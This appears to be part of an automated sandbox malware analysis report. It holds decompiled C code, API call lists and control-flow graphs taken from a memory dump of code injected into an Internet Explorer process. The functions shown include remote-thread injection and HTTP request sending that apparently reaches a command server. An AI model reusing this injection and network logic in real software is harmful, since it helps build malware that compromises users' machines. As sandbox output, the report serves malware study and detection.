				if(_t57 == 0) {
					L15:
					return E72B2159C(E72B24DC6(_t78, _t95, _t84 - 0x70), _t78);
				} else {
					_t62 = E72B21775(_t83, _t83 + 0x78,  *(_t84 + 8), 1); // executed
					if(_t62 == 0) {
						goto L15;
					}
					 *(_t84 - 4) = 0;
					if( *((intOrPtr*)(_t84 - 0x24)) == 0) {
						E72B22429(_t75, 0);
					}
					if( *(_t84 - 0x1c) == 0) {
						do {
							_push(_t84 - 0x70);
							__eflags = E72B21D27(_t75, _t78, 0, _t83, __eflags);
						} while (__eflags != 0);
						goto L14;
					} else {
						ResumeThread( *(_t84 - 0x1c)); // executed
						WaitForMultipleObjects(2, _t84 - 0x20, 0, 0xffffffff);
						CloseHandle( *(_t84 - 0x1c));
						L14:
						_t42 = _t84 - 4;
						 *_t42 =  *(_t84 - 4) | 0xffffffff;
						_t95 =  *_t42;
						goto L15;
					}
				}
			}










0x72b21f95
0x72b21f95
0x72b21f9a
0x72b21f9f
0x72b21fa6
0x72b21fa9
0x72b21fac
0x72b21fb9
0x72b21fca
0x72b21fd2
0x72b21fe8
0x72b21fff
0x72b22004
0x72b2200b
0x72b22012
0x72b22019
0x72b2201c
0x72b2201f
0x72b22025
0x72b2202f
0x72b2203a
0x72b22041
0x72b2205f
0x72b22065
0x72b2206a
0x72b2206c
0x72b2206c
0x72b2206a
0x72b22073
0x72b2207e
0x72b22080
0x72b22080
0x72b22083
0x72b2208e
0x72b22095
0x72b220fb
0x72b22109
0x72b22097
0x72b220a1
0x72b220a8
0x00000000
0x00000000
0x72b220aa
0x72b220b0
0x72b220b4
0x72b220b4
0x72b220bc
0x72b220e1
0x72b220e4
0x72b220ea
0x72b220ea
0x00000000
0x72b220be
0x72b220c1
0x72b220d0
0x72b220d9
0x72b220f7
0x72b220f7
0x72b220f7
0x72b220f7
0x00000000
0x72b220f7
0x72b220bc

APIs
  • GetStdHandle.KERNEL32(000000F4,72B253A8,000006C0,72B21D08,00000000), ref: 72B21FB7
    • Part of subcall function 72B24D44: GetVersion.KERNEL32(?,72B26150,00000034,0000032E,?,72B22004,000000FF,?,?,?,?,0000032E,?,00000000,0000032E), ref: 72B24D61
  • GetStdHandle.KERNEL32(000000F6,000000FF,?,?,?,?,0000032E,?,00000000,0000032E), ref: 72B22033
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 72B2205F
  • ResumeThread.KERNEL32(00000000,?,?,72B21829,00000001,?,?,00000000,00000002,000000FF,?,?,?,?,0000032E,?), ref: 72B220C1
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 72B220D0
  • CloseHandle.KERNEL32(00000000), ref: 72B220D9
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Handle$Thread$CloseCreateMultipleObjectsRemoteResumeVersionWait
  • String ID:
  • API String ID: 3869061129-0
  • Opcode ID: bb151290f7270c56c43afc32b5ce531f27b59d51cec2e0ace73879a3adb713dd
  • Instruction ID: 355344fad5c52479a02bf13cfb35cb00ff9462887997cb78211b3fa50bd0aa08
  • Opcode Fuzzy Hash: bb151290f7270c56c43afc32b5ce531f27b59d51cec2e0ace73879a3adb713dd
  • Instruction Fuzzy Hash: A4418BB1C00318ABDF21CFA9CC84EDFBAF8EF84351F10461AE55AA6091E7745A41CF64
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 151 72b22ff9-72b2301a call 72b24d2d 154 72b23021-72b2302b 151->154 155 72b23081-72b23092 LocalAlloc 154->155 156 72b2302d-72b2302e 154->156 159 72b23094-72b230de GetCurrentThreadId call 72b24d14 CreateThread 155->159 160 72b230f8-72b23104 call 72b21f30 155->160 157 72b23034-72b23042 156->157 158 72b2310a-72b2312f call 72b22d40 PostMessageA 156->158 162 72b23044 157->162 163 72b23049-72b23058 call 72b22d7f 157->163 159->160 171 72b230e0-72b230f2 SetThreadPriority 159->171 160->154 160->158 162->163 170 72b2305d-72b2305f 163->170 170->158 172 72b23065-72b2307a PeekMessageA 170->172 171->160 172->154 173 72b2307c 172->173 173->158
C-Code - Quality: 100%
			E72B22FF9(void* __ecx, intOrPtr* _a4) {
				intOrPtr _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				long _v16;
				struct _SECURITY_ATTRIBUTES* _v92;
				char _v144;
				struct tagMSG _v172;
				void* _t31;
				void* _t42;
				void* _t48;
				char* _t53;
				void* _t56;
				char _t60;

				E72B24D2D( &_v144, 0, 0x80);
				_v8 = 3;
				while(1) {
					L1:
					_v8 = _v8 - 1;
					_t31 = _v8 - 1;
					_v12 = 0;
					if(_t31 == 0) {
						break;
					}
					if(_t31 != 1) {
						L12:
						E72B22D40( &_v144);
						return PostMessageA( *0x72b2600c, 0x400, 1, 2);
					}
					_t54 = _a4;
					_t8 =  *_a4 + 6; // 0x4
					_t53 = _t8;
					_t60 =  *0x72b260ce; // 0x0
					if(_t60 != 0) {
						_t53 = 0x72b260ce;
					}
					_t48 = E72B22D7F( &_v144, _t53, _t45 + 2,  *((intOrPtr*)(_t54 + 4))); // executed
					if(_t48 > 0) {
						if(PeekMessageA( &_v172, 0, 0x12, 0x12, 0) == 0) {
							continue;
						}
					}
					goto L12;
				}
				_t56 = LocalAlloc(0x40, 0x4464);
				if(_t56 != 0) {
					 *(_t56 + 0x70) =  *(_t56 + 0x70) | 0xffffffff;
					 *(_t56 + 0x5c) =  *(_t56 + 0x5c) | 0x00000004;
					 *((intOrPtr*)(_t56 + 0x3ba8)) = GetCurrentThreadId();
					_t18 = _t56 + 0x3c58; // 0x3c58
					E72B24D14(_t18,  &_v144, 0x80);
					 *((intOrPtr*)(_t56 + 0x6c)) = 3;
					_t42 = CreateThread(0, 0, E72B21C2C, _t56, 0,  &_v16); // executed
					 *(_t56 + 0x3ba4) = _t42;
					if(_t42 != 0) {
						_v92 = 0;
						_v12 = 1;
						SetThreadPriority( *(_t56 + 0x3ba4), 0xfffffff1); // executed
					}
				}
				E72B21F30(_t56, _v12);
				if(_v12 != 0) {
					goto L1;
				} else {
					goto L12;
				}
			}















0x72b23015
0x72b2301a
0x72b23021
0x72b23021
0x72b23021
0x72b23027
0x72b23028
0x72b2302b
0x00000000
0x00000000
0x72b2302e
0x72b2310a
0x72b23111
0x72b2312f
0x72b2312f
0x72b23034
0x72b23039
0x72b23039
0x72b2303c
0x72b23042
0x72b23044
0x72b23044
0x72b23058
0x72b2305f
0x72b2307a
0x00000000
0x00000000
0x72b2307c
0x00000000
0x72b2305f
0x72b2308e
0x72b23092
0x72b23094
0x72b23098
0x72b230a2
0x72b230b0
0x72b230b7
0x72b230c9
0x72b230d0
0x72b230d6
0x72b230de
0x72b230e2
0x72b230eb
0x72b230f2
0x72b230f2
0x72b230de
0x72b230fc
0x72b23104
0x00000000
0x00000000
0x00000000
0x00000000

APIs
  • PeekMessageA.USER32(?,00000000,00000012,00000012,00000000), ref: 72B23072
  • LocalAlloc.KERNEL32(00000040,00004464,?,00000000,00000080), ref: 72B23088
  • GetCurrentThreadId.KERNEL32 ref: 72B2309C
  • CreateThread.KERNEL32(00000000,00000000,72B21C2C,00000000,00000000,?), ref: 72B230D0
  • SetThreadPriority.KERNEL32(?,000000F1), ref: 72B230F2
  • PostMessageA.USER32 ref: 72B23125
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Thread$Message$AllocCreateCurrentLocalPeekPostPriority
  • String ID:
  • API String ID: 2250156434-0
  • Opcode ID: abc693c2b54a9fea2a3e5a45b99c7ce19da87f2b526a230208ad191b8d5988ec
  • Instruction ID: 600c3e933443d6e78f6ca0bd9c7fa0cb8a0584d99d1a0196c81ce118fa489354
  • Opcode Fuzzy Hash: abc693c2b54a9fea2a3e5a45b99c7ce19da87f2b526a230208ad191b8d5988ec
  • Instruction Fuzzy Hash: 1A316171900704BFDB219BA9CC49FCBBBFCEB84746F104559F65AE6181E7709A48CB20
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 174 72b21775-72b21784 175 72b2181a-72b21826 174->175 176 72b2178a-72b217db InitializeCriticalSection CreateEventA * 2 174->176 177 72b21812-72b21813 call 72b216ba 176->177 178 72b217dd-72b217df 176->178 183 72b21818-72b21819 177->183 178->177 179 72b217e1-72b217e4 178->179 181 72b21801-72b21810 SetThreadPriority 179->181 182 72b217e6-72b217ff CreateThread 179->182 181->183 182->177 182->181 183->175
C-Code - Quality: 100%
			E72B21775(intOrPtr _a4, long _a8, _Unknown_base(*)()* _a12, int _a16) {
				signed char _t21;
				void* _t28;
				void* _t32;
				void* _t40;

				_t40 = _a8;
				_t21 =  *(_t40 + 0x1b44);
				if((_t21 & 0x00000001) == 0) {
					 *(_t40 + 0x1b44) = _t21 | 0x00000001;
					_t7 = _a4 + 0x70; // 0x840f4800
					 *((intOrPtr*)(_t40 + 0x1b48)) = _a4;
					 *((intOrPtr*)(_t40 + 0x1b14)) =  *_t7;
					InitializeCriticalSection(_t40 + 0x1b18);
					 *((intOrPtr*)(_t40 + 0x1b40)) = CreateEventA(0, 1, 0, 0);
					_t28 = CreateEventA(0, 1, 0, 0);
					 *(_t40 + 0x1b10) = _t28;
					if( *((intOrPtr*)(_t40 + 0x1b40)) == 0 || _t28 == 0) {
						L6:
						E72B216BA(_t40);
					} else {
						if(_a12 == 0) {
							L5:
							SetThreadPriority( *(_t40 + 0x1b0c), _a16); // executed
						} else {
							_t32 = CreateThread(0, 0, _a12, _t40, 0,  &_a8); // executed
							 *(_t40 + 0x1b0c) = _t32;
							if(_t32 == 0) {
								goto L6;
							} else {
								goto L5;
							}
						}
					}
				}
				return  *(_t40 + 0x1b44) & 1;
			}







0x72b21779
0x72b2177c
0x72b21784
0x72b2178c
0x72b21795
0x72b21799
0x72b217a7
0x72b217ad
0x72b217c7
0x72b217cd
0x72b217cf
0x72b217db
0x72b21812
0x72b21813
0x72b217e1
0x72b217e4
0x72b21801
0x72b2180a
0x72b217e6
0x72b217f1
0x72b217f7
0x72b217ff
0x00000000
0x00000000
0x00000000
0x00000000
0x72b217ff
0x72b217e4
0x72b21819
0x72b21826

APIs
  • InitializeCriticalSection.KERNEL32(?,00000000,?,?,?,72B22093,?,?,00000000,00000002,000000FF,?,?,?,?,0000032E), ref: 72B217AD
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,72B22093,?,?,00000000,00000002,000000FF,?,?,?,?,0000032E), ref: 72B217C0
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,72B22093,?,?,00000000,00000002,000000FF,?,?,?,?,0000032E), ref: 72B217CD
  • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 72B217F1
  • SetThreadPriority.KERNEL32(?,?,?,72B22093,?,?,00000000,00000002,000000FF,?,?,?,?,0000032E,?,00000000), ref: 72B2180A
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Create$EventThread$CriticalInitializePrioritySection
  • String ID:
  • API String ID: 2454249074-0
  • Opcode ID: c8a72f0a4be396ac6ee2950f9911c6e9136fd36da346fd89e7378417be704383
  • Instruction ID: 2b7b849261d314237348428b04d03b57a499ce12b49900591cbacb009e5b40d1
  • Opcode Fuzzy Hash: c8a72f0a4be396ac6ee2950f9911c6e9136fd36da346fd89e7378417be704383
  • Instruction Fuzzy Hash: 41117C32110784AFC7319F2ACC84EE7BBF9FBC9751B14891EF96A86102E331A440DB60
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 100%
			E72B2253C(void* __ecx, void* __eflags, void* _a4) {
				long _v8;
				long _v12;
				void* _t7;
				void* _t9;
				void* _t19;

				_v8 = _v8 & 0x00000000;
				_t7 = GetStdHandle(0xfffffff4);
				_t9 = CreateRemoteThread(_t7, 0, 0, E72B23223(E72B22314), _a4, 0,  &_v12); // executed
				_t19 = _t9;
				if(_t19 != 0) {
					WaitForSingleObject(_t19, 0xffffffff);
					GetExitCodeThread(_t19,  &_v8);
					CloseHandle(_t19);
				}
				return _v8;
			}








0x72b22541
0x72b22548
0x72b22569
0x72b2256f
0x72b22573
0x72b22578
0x72b22583
0x72b2258a
0x72b2258a
0x72b22595

APIs
  • GetStdHandle.KERNEL32(000000F4,?,?,?,?,72B227C2,?,?,?,?,?,72B2164B,?,?,?), ref: 72B22548
  • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 72B22569
  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,72B227C2,?,?,?,?,?,72B2164B,?,?,?), ref: 72B22578
  • GetExitCodeThread.KERNEL32(00000000,00000000,?,?,?,72B227C2,?,?,?,?,?,72B2164B,?,?,?), ref: 72B22583
  • CloseHandle.KERNEL32(00000000,?,?,?,72B227C2,?,?,?,?,?,72B2164B,?,?,?), ref: 72B2258A
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: HandleThread$CloseCodeCreateExitObjectRemoteSingleWait
  • String ID:
  • API String ID: 3128336559-0
  • Opcode ID: 2b8f83884517cb3ba26775e358e24cda4cd880b66a82d5994a4a5c0914fcdb4e
  • Instruction ID: 009471020fc4e506f9a1f4f8785b6e6bc51251f61989519d315005196ebec4ca
  • Opcode Fuzzy Hash: 2b8f83884517cb3ba26775e358e24cda4cd880b66a82d5994a4a5c0914fcdb4e
  • Instruction Fuzzy Hash: 9CF09077450344BFDB118795CC49FAF36F8DB857A1F310618F615A31C2DB74A5019725
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 189 72b2294c-72b22968 call 72b24a94 192 72b22970-72b229c4 wsprintfA HttpSendRequestA 189->192 193 72b2296a-72b2296d 189->193 195 72b229c6-72b229ca 192->195 196 72b229d8-72b229e1 call 72b2159c 192->196 193->192 195->196
C-Code - Quality: 86%
			E72B2294C(void* __ebx, void* __edx, void* __esi, void* __eflags) {
				short* _t19;
				int _t24;
				short _t28;
				void* _t29;
				void* _t30;
				intOrPtr _t32;
				void* _t33;

				_t29 = __edx;
				_push(0x8c);
				_push(0x72b253d8);
				E72B24A94(__ebx, _t30, __esi);
				_t32 =  *((intOrPtr*)(_t33 + 8));
				_t19 = _t32 + 0x3cb0;
				if( *_t19 == 0) {
					_t28 = 0x30;
					 *_t19 = _t28;
				}
				 *(_t33 - 4) = 0;
				wsprintfA(_t33 - 0x9c, "Content-Length: %d\r\n%s: %s\r\n",  *(_t33 + 0x10), "TagId", _t19);
				 *((intOrPtr*)(_t32 + 0x3c70))( *(_t32 + 0x3c60), _t33 - 0x9c, 0xffffffff, 0xa0000000);
				_t24 = HttpSendRequestA( *(_t32 + 0x3c60), 0, 0,  *(_t33 + 0xc),  *(_t33 + 0x10));
				 *(_t33 - 0x1c) = _t24;
				if(_t24 == 0) {
					 *(_t32 + 0x5c) =  *(_t32 + 0x5c) & 0x000000fb;
				}
				 *(_t33 - 4) =  *(_t33 - 4) | 0xffffffff;
				return E72B2159C(_t24, _t29);
			}










0x72b2294c
0x72b2294c
0x72b22951
0x72b22956
0x72b2295b
0x72b2295e
0x72b22968
0x72b2296c
0x72b2296d
0x72b2296d
0x72b22970
0x72b22988
0x72b229a5
0x72b229b9
0x72b229bf
0x72b229c4
0x72b229c6
0x72b229c6
0x72b229d8
0x72b229e1

APIs
  • wsprintfA.USER32 ref: 72B22988
  • HttpSendRequestA.WININET(?,00000000,00000000,?,?), ref: 72B229B9
Strings
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: HttpRequestSendwsprintf
  • String ID: Content-Length: %d%s: %s$TagId
  • API String ID: 2076034926-1589559193
  • Opcode ID: 1f0392a83556ce175696367e57bada25f7a316907c1632c483e3097c36dedfd6
  • Instruction ID: 2e58099248e1f5e2e9d4c2e7d97d0df0c294e3bc8f827e7bb89a638015fdf798
  • Opcode Fuzzy Hash: 1f0392a83556ce175696367e57bada25f7a316907c1632c483e3097c36dedfd6
  • Instruction Fuzzy Hash: FA019271414359EFEB129F78CC44E9ABBB8BF04315F104658F9AAF6092D7305A50DF10
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 199 72b22ea1-72b22eae 200 72b22eb0-72b22ef7 PostThreadMessageA WaitForSingleObject CloseHandle call 72b23c14 199->200 201 72b22f0c-72b22f13 199->201 210 72b22f01-72b22f03 200->210 211 72b22ef9-72b22eff 200->211 203 72b22f15-72b22f2c call 72b237be 201->203 204 72b22f4c-72b22f4e 201->204 212 72b22f34-72b22f3a 203->212 213 72b22f2e 203->213 205 72b22f90 204->205 209 72b22f91-72b22f93 205->209 210->201 214 72b22f05-72b22f07 210->214 211->201 211->210 215 72b22f71-72b22f8b CreateThread 212->215 216 72b22f3c-72b22f4a 212->216 213->212 214->209 215->205 216->204 217 72b22f50-72b22f6a call 72b237be 216->217 217->215
C-Code - Quality: 100%
			E72B22EA1(void* __ecx, intOrPtr _a4) {
				char _v8;
				signed char _t5;
				void* _t6;
				intOrPtr _t8;
				char* _t9;
				void* _t23;
				intOrPtr _t24;
				intOrPtr _t25;

				_t23 =  *0x72b260a8; // 0x100
				if(_t23 == 0) {
					L5:
					__eflags =  *0x72b26088; // 0x0
					if(__eflags != 0) {
						L10:
						_t6 = 0;
					} else {
						E72B237BE(_t5, __eflags, 0x72b2603c,  *0x72b260a0);
						__eflags =  *0x72b2605f; // 0x1
						if(__eflags == 0) {
							 *0x72b260b8 = 0;
						}
						__eflags =  *0x72b260b8; // 0x1
						if(__eflags != 0) {
							L12:
							 *0x72b26030 = 0x72b2603c; // executed
							_t6 = CreateThread(0, 0, E72B23132, 0, 0, 0x72b26148); // executed
							 *0x72b260a8 = _t6;
						} else {
							 *0x72b26034 =  *0x72b26034 + 1;
							_t8 =  *0x72b26034; // 0x0
							__eflags = _t8 - _a4;
							if(__eflags < 0) {
								_t9 =  *0x72b260a0; // 0x72b27226
								 *_t9 = 0;
								E72B237BE(_t9, __eflags, 0x72b2603c,  *0x72b260a0);
								 *0x72b2605f = 1;
								 *0x72b260b8 = 1;
								goto L12;
							} else {
								goto L10;
							}
						}
					}
				} else {
					PostThreadMessageA( *0x72b26148, 0x12, 0, 0);
					WaitForSingleObject( *0x72b260a8, 0x7530);
					CloseHandle( *0x72b260a8);
					 *0x72b260a8 = 0;
					_t5 =  *((intOrPtr*)(E72B23C14(0x1e, 0,  &_v8)));
					_t24 =  *0x72b2602c; // 0x0
					if(_t24 != 0) {
						L3:
						if((_t5 & 0x00000004) == 0) {
							goto L5;
						} else {
							_t6 = 0;
						}
					} else {
						_t25 =  *0x72b260b8; // 0x1
						if(_t25 == 0) {
							goto L5;
						} else {
							goto L3;
						}
					}
				}
				return _t6;
			}











0x72b22ea8
0x72b22eae
0x72b22f0c
0x72b22f0d
0x72b22f13
0x72b22f4c
0x72b22f4c
0x72b22f15
0x72b22f21
0x72b22f26
0x72b22f2c
0x72b22f2e
0x72b22f2e
0x72b22f34
0x72b22f3a
0x72b22f71
0x72b22f7f
0x72b22f85
0x72b22f8b
0x72b22f3c
0x72b22f3c
0x72b22f42
0x72b22f47
0x72b22f4a
0x72b22f50
0x72b22f55
0x72b22f5e
0x72b22f63
0x72b22f6a
0x00000000
0x00000000
0x00000000
0x00000000
0x72b22f4a
0x72b22f3a
0x72b22eb0
0x72b22eba
0x72b22ecb
0x72b22ed7
0x72b22ee4
0x72b22eef
0x72b22ef1
0x72b22ef7
0x72b22f01
0x72b22f03
0x00000000
0x72b22f05
0x72b22f05
0x72b22f05
0x72b22ef9
0x72b22ef9
0x72b22eff
0x00000000
0x00000000
0x00000000
0x00000000
0x72b22eff
0x72b22ef7
0x72b22f93

APIs
  • PostThreadMessageA.USER32 ref: 72B22EBA
  • WaitForSingleObject.KERNEL32(00007530), ref: 72B22ECB
  • CloseHandle.KERNEL32 ref: 72B22ED7
  • CreateThread.KERNEL32(00000000,00000000,Function_00003132,00000000,00000000,72B26148), ref: 72B22F85
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Thread$CloseCreateHandleMessageObjectPostSingleWait
  • String ID:
  • API String ID: 3204264564-0
  • Opcode ID: 5c150527a3dcd8632fa4d2c8eb45422c0a244393909aa92e597cd2ea823468ca
  • Instruction ID: 55e1e3665506082e23fab281f5e934d135a5a335b73c88e28fd5a4c76e9a1134
  • Opcode Fuzzy Hash: 5c150527a3dcd8632fa4d2c8eb45422c0a244393909aa92e597cd2ea823468ca
  • Instruction Fuzzy Hash: 5021A7724853C4BFEB22D726C8C0B473FE9E70D2C6722081CE54AC7117D3210899E755
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 220 72b22429-72b22444 221 72b22446-72b22447 220->221 222 72b2245a 220->222 223 72b22449-72b2244a 221->223 224 72b2245c-72b22462 SetEvent 221->224 222->224 225 72b22468-72b2246f 223->225 226 72b2244c-72b22458 ResetEvent 223->226 224->225 227 72b224b3-72b224b9 225->227 228 72b22471-72b224a6 call 72b21a7e WaitForSingleObject call 72b2253c 225->228 226->225 232 72b224ab-72b224ae call 72b215ad 228->232 232->227
C-Code - Quality: 96%
			E72B22429(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t16;
				signed int _t20;
				void* _t23;
				void* _t25;
				intOrPtr _t28;
				void* _t32;
				intOrPtr* _t33;
				intOrPtr _t35;

				_t28 = _a4;
				_t3 = _t28 + 0x1b48; // 0x98e9
				_t35 =  *_t3 + 0x78;
				_t32 = 1;
				_t16 = _a8;
				if(_t16 == 0) {
					_t35 = _t28;
					L5:
					_t5 = _t28 + 0x1b40; // 0xfc4ce856
					SetEvent( *_t5);
					L6:
					if(( *(_t35 + 0x1b44) & 0x00000004) != 0) {
						_t9 = _t35 + 0x20; // 0x9891
						_t33 = _t9;
						E72B21A7E(_t35);
						_t10 = _t28 + 0x1b40; // 0x72b23369
						_t11 = _t28 + 0x1b48; // 0x98e9
						 *_t33 = _t10 -  *_t11;
						 *((intOrPtr*)(_t33 + 4)) = 0x14;
						_t13 = _t28 + 0x1b40; // 0xfc4ce856
						_t20 = WaitForSingleObject( *_t13, 0);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t33 + 8)) =  ~_t20 + 1;
						_t23 = E72B2253C(_t10 -  *_t11,  ~_t20 + 1, _t33); // executed
						_t32 = _t23;
						E72B215AD(_t35);
					}
					return _t32;
				}
				_t25 = _t16 - 1;
				if(_t25 == 0) {
					goto L5;
				}
				if(_t25 == 1) {
					_t4 = _t28 + 0x1b40; // 0xfc4ce856
					ResetEvent( *_t4);
				}
				goto L6;
			}











0x72b22430
0x72b22434
0x72b2243d
0x72b22440
0x72b22441
0x72b22444
0x72b2245a
0x72b2245c
0x72b2245c
0x72b22462
0x72b22468
0x72b2246f
0x72b22472
0x72b22472
0x72b22475
0x72b2247a
0x72b22480
0x72b22488
0x72b2248a
0x72b22491
0x72b22497
0x72b2249f
0x72b224a3
0x72b224a6
0x72b224ac
0x72b224ae
0x72b224ae
0x72b224b9
0x72b224b9
0x72b22446
0x72b22447
0x00000000
0x00000000
0x72b2244a
0x72b2244c
0x72b22452
0x72b22452
0x00000000

APIs
  • ResetEvent.KERNEL32(FC4CE856,00000000,?,?,?,72B220B9,?,00000000,?,?,72B21829,00000001,?,?,00000000,00000002), ref: 72B22452
  • SetEvent.KERNEL32(FC4CE856,00000000,?,?,?,72B220B9,?,00000000,?,?,72B21829,00000001,?,?,00000000,00000002), ref: 72B22462
  • WaitForSingleObject.KERNEL32(FC4CE856,00000000,72B21829), ref: 72B22497
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Event$ObjectResetSingleWait
  • String ID:
  • API String ID: 463700304-0
  • Opcode ID: b076a45a44b05ff2950e3405ec3ac076df081c87bdc46bd345c917783711913f
  • Instruction ID: 489b9761182771e32d3c2f36c9c0cf2ae3132ab2c47af561efee3482e56b6e31
  • Opcode Fuzzy Hash: b076a45a44b05ff2950e3405ec3ac076df081c87bdc46bd345c917783711913f
  • Instruction Fuzzy Hash: D90169361203049BCB006F69CC54AD6BBE8FF94746F198079EE5EDB157EB309814CBA0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 234 72b21829-72b21858 call 72b24a94 237 72b2185a-72b21862 WaitForSingleObject 234->237 238 72b21868-72b2186c 234->238 237->238 239 72b21871-72b21878 238->239 240 72b2187e-72b21885 239->240 241 72b219bc-72b219c7 call 72b2159c 239->241 240->241 243 72b2188b-72b21894 240->243 245 72b2189a-72b2189b 243->245 246 72b21979-72b2197c 243->246 247 72b21941-72b21944 245->247 248 72b218a1-72b218a2 245->248 246->239 246->241 249 72b21946 247->249 250 72b21949-72b21962 call 72b229e4 247->250 251 72b218a4-72b218a5 248->251 252 72b21915-72b2191d 248->252 249->250 264 72b21966 250->264 254 72b21902-72b21910 WaitForSingleObject 251->254 255 72b218a7-72b218a8 251->255 256 72b2191f-72b21928 call 72b215cc 252->256 257 72b2192d-72b21938 call 72b2162f 252->257 254->239 261 72b218e0-72b218f3 call 72b215cc 255->261 262 72b218aa-72b218ab 255->262 256->257 263 72b2193d-72b2193f 257->263 261->239 272 72b218f9-72b218fd 261->272 262->239 266 72b218ad-72b218cc call 72b22429 call 72b2294c 262->266 263->264 264->239 268 72b2196c-72b21974 call 72b2210c 264->268 276 72b218d6-72b218d9 call 72b22429 266->276 277 72b218ce-72b218d1 call 72b2210c 266->277 268->239 272->239 280 72b218de 276->280 277->276 280->272
C-Code - Quality: 96%
			E72B21829(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t52;
				void* _t53;
				void* _t58;
				void* _t60;
				intOrPtr _t62;
				void* _t64;
				void* _t66;
				intOrPtr _t68;
				void* _t72;
				void* _t80;
				intOrPtr _t82;
				intOrPtr _t85;
				void* _t86;

				_t80 = __edx;
				_push(0x20);
				_push(0x72b253f8);
				E72B24A94(__ebx, __edi, __esi);
				 *(_t86 - 0x20) =  *(_t86 - 0x20) & 0x00000000;
				_t82 =  *((intOrPtr*)(_t86 + 8));
				_t85 =  *((intOrPtr*)(_t82 + 0x1b48)) + 0x1bc8;
				 *((intOrPtr*)(_t86 - 0x24)) =  *((intOrPtr*)(_t82 + 0x1b14));
				if(( *(_t82 + 0x1b44) & 0x00000004) != 0) {
					WaitForSingleObject( *(_t85 + 0x1b40), 0xffffffff);
				}
				 *(_t86 - 4) =  *(_t86 - 4) & 0x00000000;
				while(( *(_t85 + 0x1b44) & 0x00000001) != 0 && ( *(_t82 + 0x1b44) & 0x00000001) != 0) {
